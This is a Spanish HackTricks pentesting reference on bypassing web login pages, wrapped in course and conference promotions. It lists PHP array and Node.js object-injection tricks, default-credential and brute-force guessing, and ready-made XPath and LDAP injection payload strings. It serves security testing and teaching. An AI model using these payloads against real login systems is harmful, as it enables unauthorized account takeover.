Login Bypass

Aprende hacking en AWS de cero a héroe con htARTE (Experto en Red Team de AWS de HackTricks)!

RootedCON es el evento de ciberseguridad más relevante en España y uno de los más importantes en Europa. Con la misión de promover el conocimiento técnico, este congreso es un punto de encuentro crucial para profesionales de tecnología y ciberseguridad en todas las disciplinas.

Bypass de inicio de sesión regular

Si encuentras una página de inicio de sesión, aquí puedes encontrar algunas técnicas para intentar evitarla:

  • Verifica los comentarios dentro de la página (¿desplázate hacia abajo y hacia la derecha?)

  • Verifica si puedes acceder directamente a las páginas restringidas

  • Verifica no enviar los parámetros (no enviar ninguno o solo 1)

  • Verifica el error de comparaciones de PHP: user[]=a&pwd=b , user=a&pwd[]=b , user[]=a&pwd[]=b

  • Cambia el tipo de contenido a json y envía valores json (bool true incluido)

  • Si recibes una respuesta diciendo que POST no es compatible, puedes intentar enviar el JSON en el cuerpo pero con una solicitud GET con Content-Type: application/json

  • Verifica el potencial error de análisis de nodejs (lee esto): password[password]=1

  • Nodejs transformará esa carga útil en una consulta similar a la siguiente: SELECT id, username, left(password, 8) AS snipped_password, email FROM accounts WHERE username='admin' AND`` ``password=password=1; lo que hace que la parte de la contraseña sea siempre verdadera.

  • Si puedes enviar un objeto JSON, puedes enviar "password":{"password": 1} para evitar el inicio de sesión.

  • Recuerda que para evitar este inicio de sesión aún necesitas conocer y enviar un nombre de usuario válido.

  • Agregar la opción "stringifyObjects":true al llamar a mysql.createConnection eventualmente bloqueará todos los comportamientos inesperados cuando se pase un Object como parámetro.

  • Verifica credenciales:

  • Credenciales predeterminadas de la tecnología/plataforma utilizada

  • Combinaciones comunes (root, admin, password, nombre de la tecnología, usuario predeterminado con una de estas contraseñas).

  • Crea un diccionario usando Cewl, agrega el nombre de usuario y contraseña predeterminados (si los hay) e intenta realizar un ataque de fuerza bruta utilizando todas las palabras como nombres de usuario y contraseña

  • Fuerza bruta utilizando un diccionario más grande (Fuerza bruta)

Bypass de autenticación de inyección SQL

Aquí puedes encontrar varios trucos para evitar el inicio de sesión a través de inyecciones SQL.

En la siguiente página puedes encontrar una lista personalizada para intentar evitar el inicio de sesión a través de Inyecciones SQL:

Bypass de autenticación de No SQL Injection

Aquí puedes encontrar varios trucos para evitar el inicio de sesión a través de No SQL Injections.

Dado que las Inyecciones NoSQL requieren cambiar el valor de los parámetros, deberás probarlos manualmente.

Bypass de autenticación de XPath Injection

Aquí puedes encontrar varios trucos para evitar el inicio de sesión a través de XPath Injection.

' or '1'='1
' or ''='
' or 1]%00
' or /* or '
' or "a" or '
' or 1 or '
' or true() or '
'or string-length(name(.))<10 or'
'or contains(name,'adm') or'
'or contains(.,'adm') or'
'or position()=2 or'
admin' or '
admin' or '1'='2

Bypass de autenticación de inyección LDAP

Aquí puedes encontrar varios trucos para evitar el inicio de sesión a través de Inyección LDAP.

*
*)(&
*)(|(&
pwd)
*)(|(*
*))%00
admin)(&)
pwd
admin)(!(&(|
pwd))
admin))(|(|

Recuérdame

Si la página tiene funcionalidad de "Recuérdame", verifica cómo está implementada y ve si puedes abusar de ella para tomar el control de otras cuentas.

Redirecciones

Las páginas generalmente redirigen a los usuarios después de iniciar sesión, verifica si puedes alterar esa redirección para causar un Redireccionamiento Abierto. Tal vez puedas robar información (códigos, cookies...) si rediriges al usuario a tu página web.

Otros Controles

  • Verifica si puedes enumerar nombres de usuario abusando de la funcionalidad de inicio de sesión.

  • Verifica si el autocompletar está activo en los formularios de contraseña/información sensible de entrada: <input autocomplete="false"

​​RootedCON es el evento de ciberseguridad más relevante en España y uno de los más importantes en Europa. Con la misión de promover el conocimiento técnico, este congreso es un punto de encuentro crucial para profesionales de la tecnología y ciberseguridad en todas las disciplinas.

Aprende hacking en AWS de cero a héroe con htARTE (HackTricks AWS Red Team Expert)!

Última actualización